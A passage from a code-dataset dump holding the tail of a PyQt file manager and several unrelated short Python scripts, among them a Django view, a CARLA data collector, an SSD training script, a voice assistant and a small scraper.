self.prev_path.append(self.path_address)\n self.curr += 1\n except:\n self.prev_path.append(self.path_address)\n self.curr += 1\n\n def path_main(self):\n self.index = self.mainArea.currentIndex()\n self.path_address = self.mainModel.filePath(self.index)\n try:\n if os.path.isdir(self.path_address) and (self.path_address != self.prev_path[self.curr]):\n self.prev_path.append(self.path_address)\n self.curr += 1\n except:\n self.prev_path.append(self.path_address)\n self.curr += 1\n\n def left_to_main(self):\n self.path_left()\n self.prev_path.insert(self.curr + 1, self.prev_path[-1])\n self.prev_path = self.prev_path[:self.curr + 1]\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n self.mainArea.setSortingEnabled(True)\n self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n\n def double_main(self):\n self.path_main()\n self.prev_path.insert(self.curr, self.prev_path[-1])\n self.prev_path = self.prev_path[:self.curr + 1]\n if os.path.isdir(self.path_address):\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n self.leftPane.setFocus()\n else:\n os.startfile(self.path_address, \"open\")\n\n def actions(self):\n self.Open = QAction(\"Open\", triggered = self.double_main)\n self.mainArea.addAction(self.Open)\n\n self.Create = QAction(\"New Folder\", triggered = self.newFolder)\n self.Create.setShortcut(QKeySequence(\"Ctrl+n\"))\n self.mainArea.addAction(self.Create)\n\n self.Cut = QAction(\"Cut\", triggered = self.cut)\n self.Cut.setShortcut(QKeySequence(\"Ctrl+x\"))\n self.mainArea.addAction(self.Cut)\n\n self.Copy = QAction(\"Copy\", triggered = self.copy)\n self.Copy.setShortcut(QKeySequence(\"Ctrl+c\"))\n self.mainArea.addAction(self.Copy)\n\n self.Paste = QAction(\"Paste\", triggered = self.paste)\n self.Paste.setShortcut(QKeySequence(\"Ctrl+v\"))\n self.mainArea.addAction(self.Paste)\n\n self.Rename = QAction(\"Rename\", triggered = self.rename)\n self.Rename.setShortcut(QKeySequence(Qt.Key_F2))\n self.mainArea.addAction(self.Rename)\n\n self.Delete = QAction(\"Delete\", triggered = self.deleteFileFolder)\n self.Delete.setShortcut(QKeySequence(\"Del\"))\n self.mainArea.addAction(self.Delete)\n\n\n def context_menu(self):\n menu = QMenu(self.mainArea)\n menu.addAction(self.Open)\n menu.addAction(self.Create)\n menu.addAction(self.Rename)\n menu.addAction(self.Cut)\n menu.addAction(self.Copy)\n menu.addAction(self.Paste)\n menu.addAction(self.Delete)\n\n cursor = QCursor()\n menu.exec_(cursor.pos())\n\n def refresh_mainArea(self):\n self.mainModel.refresh(self.index)\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n\n\n def newFolder(self):\n self.path_left()\n dlg = QInputDialog(self.mainArea)\n foldername, ok = dlg.getText(self.mainArea, 'Folder Name', \"Folder Name:\", QLineEdit.Normal, \"\", Qt.Dialog)\n if ok:\n success = QDir(self.path_address).mkdir(foldername)\n self.refresh_mainArea()\n\n def deleteFileFolder(self):\n self.path_main()\n try:\n if os.path.isdir(self.path_address):\n shutil.rmtree(self.path_address, ignore_errors = True)\n else:\n os.remove(self.path_address)\n self.refresh_mainArea()\n except:\n return\n\n self.path_left()\n self.refresh_mainArea()\n\n def move_prev(self):\n try:\n self.path_address = self.path_address[:(len(self.path_address) - len(os.path.basename(self.path_address)) - 1)]\n except:\n return\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n if self.path_address.isalpha():\n self.path.setText(\"\")\n return\n self.path.setText(self.path_address)\n self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n self.leftPane.setFocus()\n\n def go_back(self):\n if self.curr <= 0:\n self.curr = 0\n return\n self.curr -= 1\n self.path_address = self.prev_path[self.curr]\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n self.leftPane.setFocus()\n\n def go_next(self):\n if self.curr >= len(self.prev_path) - 1:\n self.curr = len(self.prev_path) - 1\n return\n if self.curr < 0:\n self.curr = 0\n self.curr += 1\n self.path_address = self.prev_path[self.curr]\n self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n self.leftPane.setFocus()\n\n def copy(self):\n self.path_main()\n self.temp = self.path_address\n\n def paste(self):\n try:\n if self.cut_flag:\n self.cutPaste()\n return\n self.path_left()\n if os.path.isdir(self.temp):\n shutil.copytree(self.temp, self.path_address + \"/\" + os.path.basename(self.temp))\n self.refresh_mainArea()\n return\n shutil.copy2(self.temp, self.path_address)\n self.refresh_mainArea()\n except:\n return\n\n def cut(self):\n if os.path.isdir(self.temp):\n shutil.move(self.temp, self.path_address + \"/\" + os.path.basename(self.temp))\n self.refresh_mainArea()\n return\n self.path_main()\n self.temp = self.path_address\n self.cut_flag = True\n\n def cutPaste(self):\n self.path_left()\n shutil.move(self.temp, self.path_address)\n self.refresh_mainArea()\n self.cut_flag = False\n\n def rename(self):\n self.path_main()\n dlg = QInputDialog(self.mainArea)\n newname, ok = dlg.getText(self.mainArea, 'Rename', \"New Name:\", QLineEdit.Normal, \"\", Qt.Dialog)\n if ok:\n l = len(os.path.basename(self.path_address))\n os.rename(self.path_address, (self.path_address[:l] + newname))\n self.path_address = self.path_address[:l]\n self.index = self.mainModel.index(self.path_address)\n self.refresh_mainArea()\n\n def darkMode(self):\n if self.darkMode_flag:\n black = \"white\"\n white = \"black\"\n self.darkMode_flag = False\n icon8 = QtGui.QIcon()\n icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-moon-and-stars-50.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.dark_Button.setIcon(icon8)\n self.mainArea.horizontalHeader().show()\n else:\n black = \"#212120\"\n white = \"white\"\n self.darkMode_flag = True\n icon8 = QtGui.QIcon()\n icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-sun-80.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.dark_Button.setIcon(icon8)\n self.mainArea.horizontalHeader().hide()\n \n MainWindow.setStyleSheet(f\"background: {black};\")\n self.frame.setStyleSheet(f\"background: {black};\")\n self.path.setStyleSheet(f\"color: {white};\")\n self.path_label.setStyleSheet(f\"font-size: 15px; font-family: Bahnschrift SemiBold; color: {white};\")\n self.cut_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n self.copy_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n self.paste_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n self.delete_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n self.newFolder_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n self.leftPane.setStyleSheet(f\"background: {black}; color: {white};\")\n self.mainArea.setStyleSheet(f\"background: {black}; color: {white};\")\n self.hideButton.setStyleSheet(f\"background: {black}; border: none\")\n\n def enableHidden(self):\n if self.hiddenEnabled == False:\n self.mainModel.setFilter(QDir.NoDotAndDotDot | QDir.Hidden | QDir.AllDirs | QDir.Files)\n self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.Hidden | QDir.AllDirs)\n self.hiddenEnabled = True\n else:\n self.mainModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs | QDir.Files)\n self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs)\n self.hiddenEnabled = False\n\n\nimport images\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"THEAKS1/fileManager","sub_path":"file_explo.py","file_name":"file_explo.py","file_ext":"py","file_size_in_byte":22005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10968903513","text":"import os\nimport os.path\n\nfrom django.apps import apps\nfrom django.shortcuts import render\nfrom django.views import View\n\n\nclass DirsView(View):\n def get(self, request, path: str, *args, **kwargs):\n parts = path.split(\"/\")\n app = \".\".join(parts[:-1])\n dir_name = parts[-1]\n app_config = next(filter(lambda c: c.name == app, apps.app_configs.values()))\n app_root = app_config.path\n template_dir = os.path.join(app_root, dir_name)\n\n template_list = []\n for base_dir, dirnames, filenames in os.walk(template_dir):\n for filename in filenames:\n template_list.append(os.path.join(base_dir, filename))\n\n return render(request, 'templates_debugger/dirs.html', context={\n 'files': template_list\n })\n","repo_name":"safecube/django-templates-debugger","sub_path":"templates_debugger/views/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39483177894","text":"\"\"\" https://docs.python.org/3/howto/logging.html#logging-advanced-tutorial \"\"\"\nimport logging.config\nimport logging\nfrom pathlib import Path\n\nfrom yaml import load, Loader # python -m pip install pyyaml\nfrom yaml import Loader\n\n\nfrom extra_module import hello_world\nfrom libs import some_module\n\n\n# logging filters can be used to filter based on _content_, not (only) level\nLOGGING_CONFIG = Path(\"logging.yaml\")\n# LOGGING_CONFIG = Path(\"logging_2.yaml\")\n\nlogging.config.dictConfig(\n config=load(LOGGING_CONFIG.read_text(), Loader=Loader))\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef log_stuff():\n\n logger.debug(\"Main funktiossa debug-viesti\")\n logger.info(\"Main funktiossa info-viesti\")\n logger.warning(\"Main funktiossa warning-viesti\")\n logger.error(\"Main funktiossa error-viesti\")\n logger.critical(\"Main funktiossa critical-viesti\")\n\n hello_world()\n some_module.kewl_stuff()\n\n try:\n 1/0\n except Exception:\n logger.error(\"you did stupid\")\n\n\nif __name__ == '__main__':\n log_stuff()\n","repo_name":"PythonVinkit/youtube-sarja","sub_path":"03_logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40364055934","text":"# %%\n# Name : Gaurav Sanjeev Taneja\n# ID : 1001955801\n# Python version: 3.10.4\n# OS: Windiows 11\n\nimport os # this import is good practice when code is deployed on different OS. The import is mandatory to use its in built function for filesystem. \n# below is the function definition where we expect the path of the directory as parameter.\ndef getSize(path):\n sum = 0 # This variable is used to store and in calculation of the size\n for element in os.scandir(path): # This loop is mandatory to iterate over the list of items in the directory. Scandir gives list of all the element that are in the folder.\n if element.is_file(): # Condition to check wheteher the element is a file\n sum += element.stat().st_size # if element is the file then get the size by using inbuilt fucntion stat which uses class stat_result which helps in getting the size of the file \n elif element.is_dir(): # check if element is directory\n sum+= getSize(element.path) # If element is the directory then the update the path to iterate over all the elements of that directory to get size\n return sum # Returns the size of the direcotry given in the parameter \ntotalSize= getSize(os.getcwd()) # Function call for the calculating the size of the directory in bytes\nprint(\"The Size of the directory in bytes:\",totalSize) \n\n\n","repo_name":"Gaurav2416/Programming-language-Concepts","sub_path":"Assingments/Lab1/gst5801_lab01.py","file_name":"gst5801_lab01.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11951460944","text":"import argparse\nimport pathlib\n\nimport numpy as np\nimport tqdm\nimport carla\nimport cv2\n\nfrom PIL import Image\n\nfrom .envs.carla_env import CarlaEnv\nfrom .utils.common import visualize_birdview, colorize_segmentation\n\n\ndef save(save_dir, observations, step, debug):\n rgb = observations['rgb']\n birdview = observations['birdview']\n segmentation = observations['segmentation']\n\n pos = observations['position']\n ori = observations['orientation']\n measurements = np.float32([pos[0], pos[1], pos[2], np.arctan2(ori[1], ori[0])])\n\n np.save(save_dir / ('measurements_%04d' % step), measurements)\n np.save(save_dir / ('birdview_%04d' % step), birdview)\n\n Image.fromarray(rgb).save(save_dir / ('image_%04d.png' % step))\n Image.fromarray(segmentation).save(save_dir / ('segmentation_%04d.png' % step))\n\n if debug:\n cv2.imshow('rgb', cv2.cvtColor(rgb[:, :, :3], cv2.COLOR_BGR2RGB))\n cv2.imshow('birdview', cv2.cvtColor(visualize_birdview(birdview), cv2.COLOR_BGR2RGB))\n cv2.imshow('segmentation', cv2.cvtColor(colorize_segmentation(segmentation), cv2.COLOR_BGR2RGB))\n cv2.waitKey(1)\n\n\ndef collect_episode(env, save_dir, episode_length, frame_skip, debug):\n save_dir.mkdir()\n\n for step in tqdm.tqdm(range(episode_length)):\n spectator = env._world.get_spectator()\n spectator.set_transform(\n carla.Transform(\n env._player.get_location() + carla.Location(z=75),\n carla.Rotation(pitch=-90)))\n\n observations = env.step()\n\n if step % frame_skip == 0:\n save(save_dir, observations, step // frame_skip, debug)\n\n\ndef main(config):\n np.random.seed(0)\n\n with CarlaEnv(town='Town06', port=config.port) as env:\n for episode in range(config.episodes):\n env.reset(\n n_vehicles=np.random.choice([0, 50, 100]),\n n_pedestrians=0, seed=episode)\n env._player.set_autopilot(True)\n\n collect_episode(\n env,\n config.save_dir / ('%03d' % episode),\n config.episode_length, config.frame_skip, config.debug)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', type=int, default=2000)\n parser.add_argument('--save_dir', type=pathlib.Path, default='data')\n parser.add_argument('--episodes', type=int, default=10)\n parser.add_argument('--episode_length', type=int, default=1000)\n parser.add_argument('--frame_skip', type=int, default=10)\n parser.add_argument('--debug', action='store_true', default=False)\n\n main(parser.parse_args())\n","repo_name":"bradyz/task-distillation","sub_path":"policy_transfer/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"35"} +{"seq_id":"13077777402","text":"import requests,bs4\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef death_search(name,pren):\r\n try:\r\n url = \"https://www.avis-de-deces.net/avis-de-deces/?nomprenomdefunt={}\".format(name)\r\n r = requests.get(url)\r\n page = r.content\r\n features = \"html.parser\"\r\n soup = BeautifulSoup(page, features)\r\n\r\n names = soup.find_all('h2')\r\n villes = soup.find_all('span',{'class':'ville'})\r\n ages = soup.find_all('p',{'class':'list-item__adress'})\r\n links = soup.find_all('a',{'class':'list__link'})\r\n\r\n profile_list = []\r\n\r\n for i in range(len(names)):\r\n try:\r\n name = names[i].text.strip()\r\n loc = villes[i].text.strip()\r\n age = ages[i].text.strip()\r\n link = links[i]\r\n link = (str(link).split('\" title=\"')[0])\r\n link = str(link).replace('
    /', deleteNotepost, name=\"deleteNotepost\"),\n path('login/', login, name=\"login\"),\n path('register/', register, name=\"register\"),\n path('logout/', logout, name=\"logout\"),\n]\n","repo_name":"SadnanTunning/notepost_maker","sub_path":"notepostapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6457299956","text":"import numpy as np\nimport visual_map\nimport os, re, sys\nimport time, math, string\nfrom matplotlib import pyplot as plt\n\nprint('in python script')\n\nf = open('filter_list.tmp')\n\nnum_lines = sum(1 for line in open('filter_list.tmp'))\n\ninfo_log = np.zeros(11664)\n\n# reading input file line by line to get ID of cell and spot number\nfor line in xrange(0, num_lines):\n\n line_content = f.readline()\n\n line_content = line_content.split()\n\n filename = line_content[0]\n\n i = int(filename[-9:-4])\n\n if sys.argv[1] == '-s':\n info_log[i] = int(line_content[1])\n\n if sys.argv[1] == '-i':\n info_log[i] = line_content[1]\n\n#for i in xrange(0,num_lines):\n# print(spot_log[i])\n\nx_list, y_list, z_list = [], [], []\n# [addr] = i, [i] = addr \ncollect_addr_dict, collect_ordr_dict = visual_map.collect_dicts()\n#normal_addr_dict, normal_ordr_dict = visual_map.normal_dicts()\nfid_list, corners_list = visual_map.index11664_fiducials()\n\nfor j in range(0, 11664):\n addr = collect_ordr_dict[j]\n #addr = normal_ordr_dict[j]\n x, y = visual_map.get_xy(addr)\n \n if(sys.argv[1] == '-s'):\n z = info_log[j]\n \"\"\"\"\n if(info_log[j] > 50):\n z = 100\n else:\n z = 0\n \"\"\"\n\n if(sys.argv[1] == '-i'):\n if(info_log[j] > 0.1):\n z = 100\n else:\n z = 0\n\n\n x_list.append(float(x))\n y_list.append(float(y))\n z_list.append(float(z))\n\nX = np.array(x_list)\nY = np.array(y_list)\nZ = np.array(z_list)\nxr = X.ravel()\nyr = Y.ravel()\nzr = Z.ravel()\n\nprint('before plot')\n\nfig = plt.figure(num=None, figsize=(9,9), facecolor='0.6', edgecolor='k')\nfig.subplots_adjust(left=0.03,bottom=0.03,right=0.97,top=0.97,wspace=0,hspace=0)\nax1 = fig.add_subplot(111, aspect='equal', axisbg='0.7')\nax1.scatter(xr, yr, c=zr, s=16, alpha=1, marker='s', linewidth=0.1)#,cmap='PuOr')\nax1.set_xticks([2.2*x for x in range(11)])\nax1.set_yticks([2.5*x for x in range(11)])\nax1.set_xlim(xr.min()-0.2, xr.max()+0.2)\nax1.set_ylim(yr.min()-0.2, yr.max()+0.2)\nax1.invert_yaxis()\n\nif(sys.argv[1] == '-s'):\n plt.savefig('spot_plot.png', dpi=600, bbox_inches='tight', pad_inches=0.05)\n\nif(sys.argv[1] == '-i'):\n plt.savefig('index_plot.png', dpi=600, bbox_inches='tight', pad_inches=0.05)\n\nprint('after plot')\n\nnp.save('info_log.npy', info_log)\n","repo_name":"Laurence-Cullen/chip_scripts","sub_path":"misc/spot_map.py","file_name":"spot_map.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20724395639","text":"import pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport webbrowser as wb\r\nnghe=pyttsx3.init()\r\nvoice=nghe.getProperty('voices')\r\nnghe.setProperty('voice',voice[1].id)\r\ndef speak(audio):\r\n print('Thông tuệ vương.' + audio)\r\n nghe.say(audio)\r\n nghe.runAndWait()\r\nspeak(\"Chào Tuấn Anh \")\r\ndef time():\r\n Time=datetime.datetime.now().strftime(\"%I:%M:%p\")\r\n speak(Time)\r\ndef welcome():\r\n hour=datetime.datetime.now().hour\r\n if hour >=6 and hour <12:\r\n speak(\"Buổi sáng tốt lành thưa ông chủ\")\r\n elif hour >=12 and hour <18:\r\n speak(\"Buổi trưa tốt lành thưa ông chủ\")\r\n elif hour >=18 and hour <24:\r\n speak(\"Buổi tối tốt lành thưa ông chủ\")\r\n speak('Ông chủ cần giúp gì')\r\ndef command():\r\n c=sr.Recognizer()\r\n with sr.Microphone() as soure:\r\n c.pause_threshold=2\r\n audio=c.listen(soure)\r\n try:\r\n query=c.recognize_google(audio,language='vi')\r\n print(\"Tuấn Anh :\" + query)\r\n except sr.UnknownValueError:\r\n print(\"Bạn muốn tìm gì?\")\r\n query=str(input('Có phải bạn muốn tìm gì không?'))\r\n return query\r\n \r\nif __name__ ==\"__main__\":\r\n welcome()\r\n while True:\r\n query=command().lower()\r\n if \"google\" in query:\r\n speak(\"Tuấn Anh cần tìm gì?\")\r\n search=command().lower()\r\n url=f\"https://www.google.com/search?q={search}\"\r\n wb.get().open(url)\r\n speak(f'Here is your {search} on google')\r\n if \"youtube\" in query:\r\n speak(\"Tuấn Anh cần tìm gì?\")\r\n search=command().lower()\r\n url=f\"https://www.youtube.com/search?q={search}\"\r\n wb.get().open(url)\r\n speak(f'Here is your {search} on youtube')\r\n elif \"time\" in query:\r\n time()\r\n if \"facebook\" in query:\r\n speak(\"HTuấn Anh cần tìm gì?\")\r\n search=command().lower()\r\n url=f\"https://www.facebook.com/?q={search}\"\r\n wb.get().open(url)\r\n speak(f'Here is your {search} on facebook')\r\n if \"facebook\" in query:\r\n speak(\"Tuấn Anh cần tìm gì?\")\r\n search=command().lower()\r\n url=f\"https://www.facebook.com/?q={search}\"\r\n wb.get().open(url)\r\n speak(f'Here is your {search} on facebook')\r\n","repo_name":"tuananh998/Tro-li-ao-AI-python","sub_path":"nghe.py","file_name":"nghe.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7626339064","text":"def ae_count(str):\n hash = {}\n\n arr_from_str = list(str)\n for char in arr_from_str:\n if (char == 'a' or char == 'e') and (char not in hash.keys()):\n hash.update({char: 1})\n elif char == 'a' or char == 'e':\n hash[char] += 1\n\n return hash\n\nprint(ae_count(\"everyone can program!\"))\nprint(ae_count(\"keyboard\"))\nprint(ae_count('habia una vez una iguana'))\n","repo_name":"dnewbie25/App-Academy-Python-Version","sub_path":"Intro to programming with Python/Dictionaries Exercises/AE_count.py","file_name":"AE_count.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31487209345","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nfrom marblecutter import PixelCollection\nfrom marblecutter.transformations.utils import TransformationBase\n\n\nclass Terrarium(TransformationBase):\n def transform(self, pixels):\n data, bounds, _ = pixels\n (count, height, width) = data.shape\n\n if count != 1:\n raise Exception(\"Can't encode heights from multiple bands\")\n\n # we want the output to be 3-channels R, G, B with:\n # uheight = height + 32768.0\n # R = int(height) / 256\n # G = int(height) % 256\n # B = int(frac(height) * 256)\n # For nodata, we'll use R=0, which corresponds to height < 32,513 which\n # is lower than any depth on Earth.\n\n pixels = data[0]\n pixels.fill_value = 0\n\n # transform to uheight, clamping the range\n pixels += 32768.0\n np.clip(pixels, 0.0, 65535.0, out=pixels)\n\n r = (pixels / 256).astype(np.uint8)\n g = (pixels % 256).astype(np.uint8)\n b = ((pixels * 256) % 256).astype(np.uint8)\n\n return PixelCollection(np.dstack((r, g, b)), bounds), 'RGB'\n","repo_name":"mojodna/marblecutter-tilezen","sub_path":"tilezen/transformations/terrarium.py","file_name":"terrarium.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"30907202222","text":"import argparse\nimport torch\nimport time\nimport logging\nfrom solver.trainer import do_train_one_epoch, do_evaluate\nfrom solver import build_LRscheduler\nfrom solver import build_optimizer\nfrom data.dataset import make_dataLoader\nfrom utils.checkpoint import CheckPoint\nfrom ssd_detector import *\n\nimport utils.setting_dict\n\ndef train(setting_dict):\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(\"SSD.trainer\")\n logger.setLevel(logging.INFO)\n logger.info(\"start training....\")\n\n model = SSDdetector(setting_dict=setting_dict[\"model\"])\n\n ## if you want to fine tune the pretrained model\n ## just change \"the path of pretrained model\" to your model\n if setting_dict[\"fine_tune\"] :\n checkpoint = torch.load(setting_dict[\"predtrained_model\"], map_location=torch.device(\"cpu\"))\n model_dict = {}\n for key, value in checkpoint.pop(\"model\").items():\n if \"backbone\" in key:\n model_dict[key.replace(\"backbone.\",\"\")] = value\n model.backbone.load_state_dict(model_dict)\n model.load_state_dict(checkpoint.pop(\"model\"))\n\n for para in model.backbone.parameters() :\n para.requires_grad = False\n\n\n device = torch.device(setting_dict[\"device\"])\n model.to(device)\n lr = setting_dict[\"solver\"][\"LR\"]\n\n\n ## if you want to fine tune the pretrained model\n ## just change model to model.boxhead\n optimizer = build_optimizer(setting_dict[\"solver\"][\"optimizer\"], model, lr)\n scheduler = build_LRscheduler(setting_dict[\"solver\"][\"LRscheduler\"])(optimizer,\n setting_dict[\"solver\"][\"LR_STEP\"])\n train_loader = make_dataLoader(setting_dict[\"train\"], True)\n test_loader = make_dataLoader(setting_dict[\"test\"], False)\n checkpointer = CheckPoint(model, optimizer, scheduler, \"\", logger)\n print(setting_dict[\"train_epoch\"])\n for i in range(1,setting_dict[\"train_epoch\"] +1):\n do_train_one_epoch(model,train_loader,optimizer,scheduler,device,setting_dict[\"out_dir\"], i)\n if i % 1 == 0 :\n do_evaluate(model, test_loader, device,setting_dict[\"out_dir\"], i)\n if i % 7 == 0 :\n checkpointer.save(setting_dict[\"out_dir\"]+\"/v3_model_{:06d}\".format(i))\n checkpointer.save(\"finial\")\n return model\n\n\ndef main():\n torch.backends.cudnn.benchmark = True\n\n parse = argparse.ArgumentParser(description=\"PYtorch-SSD train process\")\n\n parse.add_argument(\"--out_dir\", type=str, default=\".\")\n parse.add_argument(\"--fine_tune\", type=bool, default=False)\n parse.add_argument(\"--pretrained_model\", type=str, default=\"\")\n\n args = parse.parse_args()\n utils.setting_dict.setting_dict[\"out_dir\"] = args.out_dir + utils.setting_dict.setting_dict[\"out_dir\"]\n utils.setting_dict.setting_dict[\"fine_tune\"] = args.fine_tune\n utils.setting_dict.setting_dict[\"pretrained_model\"] = args.pretrained_model\n\n model = train(setting_dict=utils.setting_dict.setting_dict)\n torch.cuda.empty_cache()\n\nif __name__ == \"__main__\" :\n main()\n\n","repo_name":"nwpu-v5-team/ICRA-RoboMaster-2020-Perception","sub_path":"SSD-Detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"35"} +{"seq_id":"69869923941","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n \n ind = 0\n for i in range(len(board)):\n for j in range(len(board[0])):\n visited = [[0 for _ in range(len(board[0]))] for _ in range(len(board))]\n ind = 0\n if board[i][j] == word[ind]:\n if self.dfs(i, j, word, visited, board, ind):\n return True\n \n return False\n \n\n# def dfs(self, board: List[List[str]], word: str, i: int, j: int, visited: List[List[bool]], k: int) -> bool:\n# if k == len(word):\n# return True\n# if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]) or board[i][j] != word[k] or visited[i][j]: \n# return False\n# visited[i][j] = True\n# res1 = self.dfs(board, word, i + 1, j, visited, k + 1)\n# res2 = self.dfs(board, word, i - 1, j, visited, k + 1)\n# res3 = self.dfs(board, word, i, j + 1, visited, k + 1)\n# res4 = self.dfs(board, word, i, j - 1, visited, k + 1)\n# visited[i][j] = False\n# return (res1 or res2 or res3 or res4)\n\n \n \n def dfs(self, i, j, word, visited, board, ind):\n \n if ind == len(word):\n return True\n \n \n if i < 0 or j < 0 or i > len(board) - 1 or j > len(board[0]) - 1 or board[i][j] != word[ind] or visited[i][j]:\n return False\n \n visited[i][j] = True\n \n res = (self.dfs(i+1, j, word, visited, board, ind+1) or self.dfs(i-1, j, word, visited, board, ind+1) or self.dfs(i, j-1, word, visited, board, ind+1) or self.dfs(i, j+1, word, visited, board, ind+1))\n \n visited[i][j] = False\n \n return res","repo_name":"Vamsi995/LeetCode-Python","sub_path":"79-word-search/79-word-search.py","file_name":"79-word-search.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70408778342","text":"#!/usr/bin/env python3\n\nimport thorpezo as t\nimport time\nimport numpy as np\n\ndef ramp(dev, volts, delay):\n dev.ignore_serial_read(True)\n dev.ser.timeout=0.0001\n for v in volts:\n dev.set_xvolt(v)\n time.sleep(delay)\n time.sleep(0.01)\n dev.ignore_serial_read(False)\n dev.ser.timeout=0.01\n\nvlist=np.linspace(0,100,10001)\n\ni=t.Thorpezo('/dev/ttyACM0')\n\np=i.device\n\np.msg('id?')\n\nramp(p, vlist,0.0001)\n","repo_name":"gabrielbenedikt/thorpezo","sub_path":"examples/ramp.py","file_name":"ramp.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24107578932","text":"# -*- coding: utf-8 -*-\r\nfrom PyQt5.QtCore import Qt, QCoreApplication, pyqtSlot, QTimer, pyqtSlot\r\nfrom PyQt5 import QtWidgets, uic\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom datetime import datetime\r\nimport sys, io, cv2\r\nimport random, pathlib, os\r\nfrom fastai.vision.all import *\r\nfrom fastai.vision.widgets import *\r\n\r\nfrom google.cloud import vision\r\nfrom google.cloud.vision_v1 import types\r\nfrom PIL import ImageGrab\r\nimport pathlib, os\r\n\r\ntemp = pathlib.PosixPath\r\n# pathlib.PosixPath = pathlib.WindowsPath\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"./files/zoomCapture-b179ff82aa06.json\"\r\n\r\n\r\ndef getInfo(dir_list, dataPath):\r\n learn_inf = load_learner(path / 'export.pkl', cpu=True)\r\n for item in dir_list:\r\n img = PILImage.create(dataPath + '/' + item)\r\n pred, pred_idx, probs = learn_inf.predict(img)\r\n name = item.split('.')[0]\r\n students_input[name] = pred\r\n print(pred)\r\n\r\n # 현재 데이터셋 폴더에 들어있는, 예측이 완료된 이미지 데이터들을 삭제\r\n # for item in dir_list:\r\n # os.remove(dataPath + '/' + item)\r\n\r\n\r\nclass MyApp1(QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n self.className = None\r\n\r\n def initUI(self):\r\n # 시작 버튼\r\n btn1 = QPushButton('Start', self)\r\n # 버튼에 기능을 연결하는 코드\r\n btn1.clicked.connect(self.button1Function)\r\n\r\n # 사진\r\n pixmap = QPixmap('logo.png')\r\n lbl_img = QLabel()\r\n lbl_img.setPixmap(pixmap)\r\n lbl_img.setAlignment(Qt.AlignCenter)\r\n\r\n # 텍스트창에 대한 